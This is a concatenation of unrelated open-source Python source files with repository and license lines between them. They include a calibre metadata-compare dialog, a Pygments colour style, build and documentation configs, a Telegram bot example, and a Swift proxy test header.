b.setIcon(QIcon(action_button[1]))
self.action_button_action = action_button[2]
b.clicked.connect(self.action_button_clicked)
self.nb = b = bb.addButton(_('&Next') if self.total > 1 else _('&OK'), bb.ActionRole)
if self.total > 1:
b.setToolTip(_('Move to next [%s]') % self.next_action.shortcut().toString(QKeySequence.NativeText))
self.next_action.triggered.connect(b.click)
b.setIcon(QIcon(I('forward.png' if self.total > 1 else 'ok.png')))
b.clicked.connect(partial(self.next_item, True))
b.setDefault(True)
l.addWidget(bb)
self.next_item(True)
desktop = QApplication.instance().desktop()
geom = desktop.availableGeometry(parent or self)
width = max(700, min(950, geom.width()-50))
height = max(650, min(1000, geom.height()-100))
self.resize(QSize(width, height))
geom = gprefs.get('diff_dialog_geom', None)
if geom is not None:
self.restoreGeometry(geom)
b.setFocus(Qt.OtherFocusReason)
def action_button_clicked(self):
self.action_button_action(self.ids[0])
def accept(self):
gprefs.set('diff_dialog_geom', bytearray(self.saveGeometry()))
self.compare_widget.save_comments_controls_state()
super(CompareMany, self).accept()
def reject(self):
gprefs.set('diff_dialog_geom', bytearray(self.saveGeometry()))
self.compare_widget.save_comments_controls_state()
super(CompareMany, self).reject()
@property
def current_mi(self):
return self.compare_widget.current_mi
def next_item(self, accept):
if not self.ids:
return self.accept()
if self.current_mi is not None:
changed = self.compare_widget.apply_changes()
if self.current_mi is not None:
old_id = self.ids.pop(0)
self.accepted[old_id] = (changed, self.current_mi) if accept else (False, None)
if not self.ids:
return self.accept()
self.setWindowTitle(self.window_title + _(' [%(num)d of %(tot)d]') % dict(
num=(self.total - len(self.ids) + 1), tot=self.total))
oldmi, newmi = self.get_metadata(self.ids[0])
self.compare_widget(oldmi, newmi)
def accept_all_remaining(self):
self.next_item(True)
for id_ in self.ids:
oldmi, newmi = self.get_metadata(id_)
self.accepted[id_] = (False, newmi)
self.ids = []
self.accept()
def reject_all_remaining(self):
self.next_item(False)
for id_ in self.ids:
oldmi, newmi = self.get_metadata(id_)
self.accepted[id_] = (False, None)
self.ids = []
self.accept()
if __name__ == '__main__':
app = QApplication([])
from calibre.library import db
db = db()
ids = sorted(db.all_ids(), reverse=True)
ids = tuple(zip(ids[0::2], ids[1::2]))
gm = partial(db.get_metadata, index_is_id=True, get_cover=True, cover_as_data=True)
get_metadata = lambda x:map(gm, ids[x])
d = CompareMany(list(xrange(len(ids))), get_metadata, db.field_metadata)
if d.exec_() == d.Accepted:
for changed, mi in d.accepted.itervalues():
if changed and mi is not None:
print (mi)
| gpl-3.0 |
mapr/hue | desktop/core/ext-py/Pygments-1.3.1/pygments/styles/monokai.py | 75 | 5080 | # -*- coding: utf-8 -*-
"""
pygments.styles.monokai
~~~~~~~~~~~~~~~~~~~~~~~
Mimic the Monokai color scheme. Based on tango.py.
http://www.monokai.nl/blog/2006/07/15/textmate-color-theme/
:copyright: Copyright 2006-2010 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.style import Style
from pygments.token import Keyword, Name, Comment, String, Error, Text, \
Number, Operator, Generic, Whitespace, Punctuation, Other, Literal
class MonokaiStyle(Style):
"""
This style mimics the Monokai color scheme.
"""
background_color = "#272822"
highlight_color = "#49483e"
styles = {
# No corresponding class for the following:
Text: "#f8f8f2", # class: ''
Whitespace: "", # class: 'w'
Error: "#960050 bg:#1e0010", # class: 'err'
Other: "", # class 'x'
Comment: "#75715e", # class: 'c'
Comment.Multiline: "", # class: 'cm'
Comment.Preproc: "", # class: 'cp'
Comment.Single: "", # class: 'c1'
Comment.Special: "", # class: 'cs'
Keyword: "#66d9ef", # class: 'k'
Keyword.Constant: "", # class: 'kc'
Keyword.Declaration: "", # class: 'kd'
Keyword.Namespace: "#f92672", # class: 'kn'
Keyword.Pseudo: "", # class: 'kp'
Keyword.Reserved: "", # class: 'kr'
Keyword.Type: "", # class: 'kt'
Operator: "#f92672", # class: 'o'
Operator.Word: "", # class: 'ow' - like keywords
Punctuation: "#f8f8f2", # class: 'p'
Name: "#f8f8f2", # class: 'n'
Name.Attribute: "#a6e22e", # class: 'na' - to be revised
Name.Builtin: "", # class: 'nb'
Name.Builtin.Pseudo: "", # class: 'bp'
Name.Class: "#a6e22e", # class: 'nc' - to be revised
Name.Constant: "#66d9ef", # class: 'no' - to be revised
Name.Decorator: "#a6e22e", # class: 'nd' - to be revised
Name.Entity: "", # class: 'ni'
Name.Exception: "#a6e22e", # class: 'ne'
Name.Function: "#a6e22e", # class: 'nf'
Name.Property: "", # class: 'py'
Name.Label: "", # class: 'nl'
Name.Namespace: "", # class: 'nn' - to be revised
Name.Other: "#a6e22e", # class: 'nx'
Name.Tag: "#f92672", # class: 'nt' - like a keyword
Name.Variable: "", # class: 'nv' - to be revised
Name.Variable.Class: "", # class: 'vc' - to be revised
Name.Variable.Global: "", # class: 'vg' - to be revised
Name.Variable.Instance: "", # class: 'vi' - to be revised
Number: "#ae81ff", # class: 'm'
Number.Float: "", # class: 'mf'
Number.Hex: "", # class: 'mh'
Number.Integer: "", # class: 'mi'
Number.Integer.Long: "", # class: 'il'
Number.Oct: "", # class: 'mo'
Literal: "#ae81ff", # class: 'l'
Literal.Date: "#e6db74", # class: 'ld'
String: "#e6db74", # class: 's'
String.Backtick: "", # class: 'sb'
String.Char: "", # class: 'sc'
String.Doc: "", # class: 'sd' - like a comment
String.Double: "", # class: 's2'
String.Escape: "#ae81ff", # class: 'se'
String.Heredoc: "", # class: 'sh'
String.Interpol: "", # class: 'si'
String.Other: "", # class: 'sx'
String.Regex: "", # class: 'sr'
String.Single: "", # class: 's1'
String.Symbol: "", # class: 'ss'
Generic: "", # class: 'g'
Generic.Deleted: "", # class: 'gd',
Generic.Emph: "italic", # class: 'ge'
Generic.Error: "", # class: 'gr'
Generic.Heading: "", # class: 'gh'
Generic.Inserted: "", # class: 'gi'
Generic.Output: "", # class: 'go'
Generic.Prompt: "", # class: 'gp'
Generic.Strong: "bold", # class: 'gs'
Generic.Subheading: "", # class: 'gu'
Generic.Traceback: "", # class: 'gt'
}
| apache-2.0 |
rohitwaghchaure/GenieManager-erpnext | erpnext/shopping_cart/product.py | 16 | 1688 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import cint, fmt_money, cstr
from erpnext.shopping_cart.cart import _get_cart_quotation
from urllib import unquote
@frappe.whitelist(allow_guest=True)
def get_product_info(item_code):
"""get product price / stock info"""
if not cint(frappe.db.get_default("shopping_cart_enabled")):
return {}
cart_quotation = _get_cart_quotation()
price_list = cstr(unquote(frappe.local.request.cookies.get("selling_price_list")))
warehouse = frappe.db.get_value("Item", item_code, "website_warehouse")
if warehouse:
in_stock = frappe.db.sql("""select actual_qty from tabBin where
item_code=%s and warehouse=%s""", (item_code, warehouse))
if in_stock:
in_stock = in_stock[0][0] > 0 and 1 or 0
else:
in_stock = -1
price = price_list and frappe.db.sql("""select price_list_rate, currency from
`tabItem Price` where item_code=%s and price_list=%s""",
(item_code, price_list), as_dict=1) or []
price = price and price[0] or None
qty = 0
if price:
price["formatted_price"] = fmt_money(price["price_list_rate"], currency=price["currency"])
price["currency"] = not cint(frappe.db.get_default("hide_currency_symbol")) \
and (frappe.db.get_value("Currency", price.currency, "symbol") or price.currency) \
or ""
if frappe.session.user != "Guest":
item = cart_quotation.get({"item_code": item_code})
if item:
qty = item[0].qty
return {
"price": price,
"stock": in_stock,
"uom": frappe.db.get_value("Item", item_code, "stock_uom"),
"qty": qty
}
| agpl-3.0 |
kleskjr/scipy | tools/osx/build.py | 27 | 2288 | """Python script to build the OSX universal binaries.
This is a simple script, most of the heavy lifting is done in bdist_mpkg.
To run this script: 'python build.py'
Requires a svn version of scipy is installed, svn is used to revert
file changes made to the docs for the end-user install. Installer is
built using sudo so file permissions are correct when installed on
user system. Script will prompt for sudo pwd.
"""
import os
import shutil
import subprocess
from getpass import getuser
SRC_DIR = '../../'
BUILD_DIR = 'build'
DIST_DIR = 'dist'
def remove_dirs():
print 'Removing old build and distribution directories...'
print """The distribution is built as root, so the files have the correct
permissions when installed by the user. Chown them to user for removal."""
if os.path.exists(BUILD_DIR):
cmd = 'sudo chown -R %s %s' % (getuser(), BUILD_DIR)
shellcmd(cmd)
shutil.rmtree(BUILD_DIR)
if os.path.exists(DIST_DIR):
cmd = 'sudo chown -R %s %s' % (getuser(), DIST_DIR)
shellcmd(cmd)
shutil.rmtree(DIST_DIR)
def build_dist():
print 'Building distribution... (using sudo)'
cmd = 'sudo python setup.py bdist_mpkg'
shellcmd(cmd)
def build_dmg():
print 'Building disk image...'
# Since we removed the dist directory at the start of the script,
# our pkg should be the only file there.
pkg = os.listdir(DIST_DIR)[0]
fn, ext = os.path.splitext(pkg)
dmg = fn + '.dmg'
srcfolder = os.path.join(DIST_DIR, pkg)
dstfolder = os.path.join(DIST_DIR, dmg)
# build disk image
cmd = 'sudo hdiutil create -srcfolder %s %s' % (srcfolder, dstfolder)
shellcmd(cmd)
def shellcmd(cmd, verbose=True):
"""Call a shell command."""
if verbose:
print cmd
try:
subprocess.check_call(cmd, shell=True)
except subprocess.CalledProcessError, err:
msg = """
Error while executing a shell command.
%s
""" % str(err)
raise Exception(msg)
def build():
# change to source directory
cwd = os.getcwd()
os.chdir(SRC_DIR)
# build distribution
remove_dirs()
build_dist()
build_dmg()
# change back to original directory
os.chdir(cwd)
if __name__ == '__main__':
build()
| bsd-3-clause |
sljrobin/listodo | listodo.py | 1 | 2521 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import collections
import os
import re
import sys
from colorama import init
from colorama import Fore, Back, Style
init()
##########################################################################################
PATTERN_01 = r'# TODO'
##########################################################################################
def check_args():
"""
Check the number of arguments
Check if the source file exists
"""
# Check there is one argument
if len(sys.argv) < 2:
sys.exit(Back.RED + Fore.WHITE + "ERROR: incorrect argument!\nUsage: %s source_code" % sys.argv[0] + Style.RESET_ALL)
# Check if the argument exists
if not os.path.exists(sys.argv[1]):
sys.exit(Back.RED + Fore.WHITE + "ERROR: '%s' does not exist!" % sys.argv[1] + Style.RESET_ALL)
##########################################################################################
def create_list(source_code):
"""
Create the list of todos
Search the pattern '# TODO'
Save the TODO's line and the TODO's description
Return the dictionary 'todos'
"""
todos = {}
pattrn = re.compile(PATTERN_01)
with open(source_code) as f:
for todo_numero, file_line in enumerate(f, 1):
if pattrn.search(file_line):
matcher = re.match( r'(.*) TODO (.*)', file_line, re.M|re.I)
if matcher:
todo_description = matcher.group(2)
todos.update({todo_numero:todo_description})
return todos
##########################################################################################
def sort_list():
"""
Sort items from smallest to largest
"""
todos = create_list(sys.argv[1])
ordered_todos = collections.OrderedDict(sorted(todos.items()))
return ordered_todos
##########################################################################################
def print_list():
"""
Print the dictionary
"""
print(Fore.RED + "%s" % sys.argv[1] + Style.RESET_ALL)
todos = sort_list()
for item in todos:
print(Fore.YELLOW + "\t%i:\t%s" %(item, todos[item]) + Style.RESET_ALL)
##########################################################################################
def main():
"""
Check the arguments
Print the TODOs
"""
check_args()
print_list()
##########################################################################################
if __name__ == "__main__":
main()
| gpl-2.0 |
s0930342674/pyload | module/plugins/accounts/DebridItaliaCom.py | 6 | 1384 | # -*- coding: utf-8 -*-
import re
import time
from module.plugins.internal.Account import Account
class DebridItaliaCom(Account):
__name__ = "DebridItaliaCom"
__type__ = "account"
__version__ = "0.16"
__status__ = "testing"
__description__ = """Debriditalia.com account plugin"""
__license__ = "GPLv3"
__authors__ = [("stickell", "l.stickell@yahoo.it"),
("Walter Purcaro", "vuolter@gmail.com")]
WALID_UNTIL_PATTERN = r'Premium valid till: (.+?) \|'
def grab_info(self, user, password, data, req):
info = {'premium': False, 'validuntil': None, 'trafficleft': None}
html = self.load("http://debriditalia.com/")
if 'Account premium not activated' not in html:
m = re.search(self.WALID_UNTIL_PATTERN, html)
if m:
validuntil = time.mktime(time.strptime(m.group(1), "%d/%m/%Y %H:%M"))
info = {'premium': True, 'validuntil': validuntil, 'trafficleft': -1}
else:
self.log_error(_("Unable to retrieve account information"))
return info
def login(self, user, password, data, req):
html = self.load("https://debriditalia.com/login.php",
get={'u': user,
'p': password})
if 'NO' in html:
self.fail_login()
| gpl-3.0 |
Alwnikrotikz/python-astm | docs/conf.py | 15 | 7955 | # -*- coding: utf-8 -*-
#
# astm documentation build configuration file, created by
# sphinx-quickstart on Sat Sep 15 16:35:42 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
from astm import __version__
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.intersphinx', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'astm'
copyright = u'2012, Alexander Shorin'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = __version__
# The full version, including alpha/beta/rc tags.
release = __version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'astmdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'astm.tex', u'astm Documentation',
u'Alexander Shorin', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'astm', u'astm Documentation',
[u'Alexander Shorin'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'astm', u'astm Documentation',
u'Alexander Shorin', 'astm', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}
| bsd-3-clause |
wichmann/PythonExamples | network/bot.py | 1 | 1620 | #!/usr/bin/env python3
#-------------------------------------------------------------------------------
# Name: bot - simple example for a telegram bot
# Usage: ./bot.py
# Author: Christian Wichmann
# Created: 13.06.2019
# Copyright: (c) Christian Wichmann 2019
# Licence: GNU GPL
#-------------------------------------------------------------------------------
from telegram.ext import Updater, CommandHandler
from telegram import bot
import logging
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# Token, das vom @BotFather bei Anlegen des Bots ausgegeben wurde
TOKEN = 'TELEGRAM_TOKEN'
def hello(bot, update):
"""Implementiert ein einfaches Kommando, das den sendenden Nutzer mit seinem Vornamen begrüßt."""
print('Nachricht empfangen...')
update.message.reply_text('Hallo {}'.format(update.message.from_user.first_name))
def callback_repeating_task(bot, job):
"""Sendet bei jedem Aufruf eine Standardnachricht an eine bestimmte Chat-ID."""
bot.send_message(chat_id='CHAT ID', text='Eine Nachricht...')
# erzeuge Warteschlage für Aufgaben, die im Hintergrund abgearbeitet werden
updater = Updater(TOKEN)
jobs = updater.job_queue
# füge neuen Handler für den Befehl "hello" hinzu
updater.dispatcher.add_handler(CommandHandler('hello', hello))
# rufe alle 10 Sekunden die Callback-Funktion auf
job_minute = jobs.run_repeating(callback_repeating_task, interval=10, first=0)
# beginne auf neue Nachrichten zu warten
updater.start_polling()
updater.idle()
| gpl-2.0 |
ddimensia/RaceCapture_App | autosportlabs/racecapture/views/configuration/rcp/scriptview.py | 1 | 6939 | import kivy
kivy.require('1.9.1')
from kivy.clock import Clock
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.stacklayout import StackLayout
from pygments.formatters.bbcode import BBCodeFormatter #explicit import to make pyinstaller work. do not remove
from kivy.uix.codeinput import CodeInput
from kivy.uix.textinput import TextInput
from pygments.lexers import PythonLexer
from kivy.app import Builder
from kivy.extras.highlight import KivyLexer
from pygments import lexers
from kivy.logger import Logger
from autosportlabs.racecapture.views.configuration.baseconfigview import BaseConfigView
from autosportlabs.uix.toast.kivytoast import toast
from iconbutton import IconButton, LabelIconButton
from settingsview import SettingsMappedSpinner
from autosportlabs.widgets.scrollcontainer import ScrollContainer
from autosportlabs.uix.button.widgetbuttons import LabelButton
from utils import paste_clipboard, is_mobile_platform
SCRIPT_VIEW_KV = 'autosportlabs/racecapture/views/configuration/rcp/scriptview.kv'
LOGFILE_POLL_INTERVAL = 1
LOGWINDOW_MAX_LENGTH_MOBILE = 1000
LOGWINDOW_MAX_LENGTH_DESKTOP = 10000
class LogLevelSpinner(SettingsMappedSpinner):
'''
A customized SettingsMappedSpinner to set the value for log levels
'''
def __init__(self, **kwargs):
super(LogLevelSpinner, self).__init__(**kwargs)
self.setValueMap({3: 'Error', 6: 'Info', 7:'Debug', 8:'Trace'}, 'Info')
self.text = 'Info'
class LuaScriptingView(BaseConfigView):
'''
Script configuration and logfile view
'''
Builder.load_file(SCRIPT_VIEW_KV)
def __init__(self, capabilities, **kwargs):
super(LuaScriptingView, self).__init__(**kwargs)
self.script_cfg = None
self.register_event_type('on_config_updated')
self._logwindow_max_length = LOGWINDOW_MAX_LENGTH_MOBILE\
if is_mobile_platform() else LOGWINDOW_MAX_LENGTH_DESKTOP
self.rc_api.addListener('logfile', lambda value: Clock.schedule_once(lambda dt: self.on_logfile(value)))
self._capabilities = capabilities
if not capabilities.has_script:
self._hide_lua()
def _hide_lua(self):
self.ids.buttons.remove_widget(self.ids.run_script)
self.ids.lua_log_wrapper.remove_widget(self.ids.lua_script_sv)
self.ids.splitter.strip_size = 0
def on_config_updated(self, rcp_cfg):
'''
Callback when the configuration is updates
:param rcp_cfg the RaceCapture configuration object
:type RcpConfig
'''
cfg = rcp_cfg.scriptConfig
if self._capabilities.has_script:
self.ids.lua_script.text = cfg.script
self.script_cfg = cfg
def on_script_changed(self, instance, value):
'''
Callback when the script text changes
:param instance the widget sourcing this event
:type instance widget
:param value the updated script value
:type value string
'''
if self.script_cfg:
self.script_cfg.script = value
self.script_cfg.stale = True
self.dispatch('on_modified')
def copy_log(self):
'''
Copies the current logfile text to the system clipboard
'''
try:
paste_clipboard(self.ids.logfile.text)
toast('RaceCapture log copied to clipboard')
except Exception as e:
Logger.error("ApplicationLogView: Error copying RaceCapture log to clipboard: " + str(e))
toast('Unable to copy to clipboard\n' + str(e), True)
#Allow crash handler to report on exception
raise e
def on_logfile(self, logfile_rsp):
'''
Extracts the logfile response and updates the logfile window
:param logfile_rsp the API response with the logfile response
:type dict
'''
value = logfile_rsp.get('logfile').replace('\r','').replace('\0','')
logfile_view = self.ids.logfile
current_text = logfile_view.text
current_text += str(value)
overflow = len(current_text) - self._logwindow_max_length
if overflow > 0:
current_text = current_text[overflow:]
logfile_view.text = current_text
self.ids.logfile_sv.scroll_y = 0.0
def clear_log(self):
'''
Clears the log file window
'''
self.ids.logfile.text = ''
def toggle_polling(self, *args):
'''
Toggle polling state
'''
checkbox = self.ids.poll_log
checkbox.active = True if checkbox.active == False else False
def enable_polling(self, instance, value):
'''
Enables or disables logfile polling
:param instance the widget instance performing the call
:type instance widget
:param value indicates True or False to enable polling
:type level bool
'''
if value:
Clock.schedule_interval(self.poll_logfile, LOGFILE_POLL_INTERVAL)
else:
Clock.unschedule(self.poll_logfile)
def poll_logfile(self, *args):
'''
Sends the API command to poll the log file
'''
self.rc_api.getLogfile()
def set_logfile_level(self, instance, level):
'''
Sends the API command to set the logfile level
:param instance the widget instance performing the call
:type instance widget
:param level the numeric log file level
:type level int
'''
self.rc_api.setLogfileLevel(level, None, self.on_set_logfile_level_error)
def on_set_logfile_level_error(self, detail):
'''
Callback for error condition of setting the logfile
:param detail the description of the error
:type detail string
'''
toast('Error Setting Logfile Level:\n\n{}'.format(detail), length_long=True)
def run_script(self, *args):
'''
Sends the API command to re-run the script.
'''
self.rc_api.runScript(self.on_run_script_complete, self.on_run_script_error)
def on_run_script_complete(self, result):
'''
Callback when the script has been restarted successfully
:param result the result of the API call
:type result dict
'''
toast('Script restarted')
def on_run_script_error(self, detail):
'''
Callback when the script fails to restart
:param detail the description of the error
:type detail string
'''
toast('Error Running Script:\n\n{}'.format(str(detail)), length_long=True)
class LuaCodeInput(CodeInput):
'''
Wrapper class for CodeInput that sets the Lua Lexer
'''
def __init__(self, **kwargs):
super(LuaCodeInput, self).__init__(**kwargs)
self.lexer= lexers.get_lexer_by_name('lua')
| gpl-3.0 |
frewsxcv/keyczar | cpp/src/tools/scons/scons-local-1.2.0.d20090223/SCons/Tool/rpcgen.py | 19 | 2876 | """SCons.Tool.rpcgen
Tool-specific initialization for RPCGEN tools.
Three normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/rpcgen.py 4043 2009/02/23 09:06:45 scons"
from SCons.Builder import Builder
import SCons.Util
cmd = "cd ${SOURCE.dir} && $RPCGEN -%s $RPCGENFLAGS %s -o ${TARGET.abspath} ${SOURCE.file}"
rpcgen_client = cmd % ('l', '$RPCGENCLIENTFLAGS')
rpcgen_header = cmd % ('h', '$RPCGENHEADERFLAGS')
rpcgen_service = cmd % ('m', '$RPCGENSERVICEFLAGS')
rpcgen_xdr = cmd % ('c', '$RPCGENXDRFLAGS')
def generate(env):
"Add RPCGEN Builders and construction variables for an Environment."
client = Builder(action=rpcgen_client, suffix='_clnt.c', src_suffix='.x')
header = Builder(action=rpcgen_header, suffix='.h', src_suffix='.x')
service = Builder(action=rpcgen_service, suffix='_svc.c', src_suffix='.x')
xdr = Builder(action=rpcgen_xdr, suffix='_xdr.c', src_suffix='.x')
env.Append(BUILDERS={'RPCGenClient' : client,
'RPCGenHeader' : header,
'RPCGenService' : service,
'RPCGenXDR' : xdr})
env['RPCGEN'] = 'rpcgen'
env['RPCGENFLAGS'] = SCons.Util.CLVar('')
env['RPCGENCLIENTFLAGS'] = SCons.Util.CLVar('')
env['RPCGENHEADERFLAGS'] = SCons.Util.CLVar('')
env['RPCGENSERVICEFLAGS'] = SCons.Util.CLVar('')
env['RPCGENXDRFLAGS'] = SCons.Util.CLVar('')
def exists(env):
return env.Detect('rpcgen')
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| apache-2.0 |
eviljeff/olympia | src/olympia/accounts/tasks.py | 2 | 1958 | import functools
from datetime import datetime
from waffle import switch_is_active
import olympia.core.logger
from olympia.amo.celery import task
from olympia.amo.decorators import use_primary_db
from olympia.users.models import UserProfile
log = olympia.core.logger.getLogger('z.accounts')
def user_profile_from_uid(f):
@functools.wraps(f)
def wrapper(uid, timestamp, *args, **kw):
try:
timestamp = datetime.fromtimestamp(timestamp)
profile = UserProfile.objects.get(fxa_id=uid)
return f(profile, timestamp, *args, **kw)
except ValueError as e:
log.warning(e)
except UserProfile.MultipleObjectsReturned:
log.warning('Multiple profile matches for FxA id %s' % uid)
except UserProfile.DoesNotExist:
log.info('No profile match for FxA id %s' % uid)
return wrapper
@task
@use_primary_db
@user_profile_from_uid
def primary_email_change_event(profile, changed_date, email):
"""Process the primaryEmailChangedEvent."""
if (not profile.email_changed or
profile.email_changed < changed_date):
profile.update(email=email, email_changed=changed_date)
log.info(
'Account pk [%s] email [%s] changed from FxA on %s' % (
profile.id, email, changed_date))
else:
log.warning('Account pk [%s] email updated ignored, %s > %s' %
(profile.id, profile.email_changed, changed_date))
@task
@use_primary_db
@user_profile_from_uid
def delete_user_event(user, deleted_date):
"""Process the delete user event."""
if switch_is_active('fxa-account-delete'):
user.delete(addon_msg='Deleted via FxA account deletion')
log.info(
'Account pk [%s] deleted from FxA on %s' % (user.id, deleted_date))
else:
log.info(
f'Skipping deletion from FxA for account [{user.id}] because '
'waffle inactive')
| bsd-3-clause |
matthewoliver/swift | test/unit/proxy/controllers/test_obj.py | 2 | 211683 | #!/usr/bin/env python
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import email.parser
import itertools
import math
import random
import time
import unittest
from collections import defaultdict
from contextlib import contextmanager
import json
from hashlib import md5
import mock
from eventlet import Timeout
from six import BytesIO
from six.moves import range
import swift
from swift.common import utils, swob, exceptions
from swift.common.exceptions import ChunkWriteTimeout
from swift.common.utils import Timestamp, list_from_csv
from swift.proxy import server as proxy_server
from swift.proxy.controllers import obj
from swift.proxy.controllers.base import \
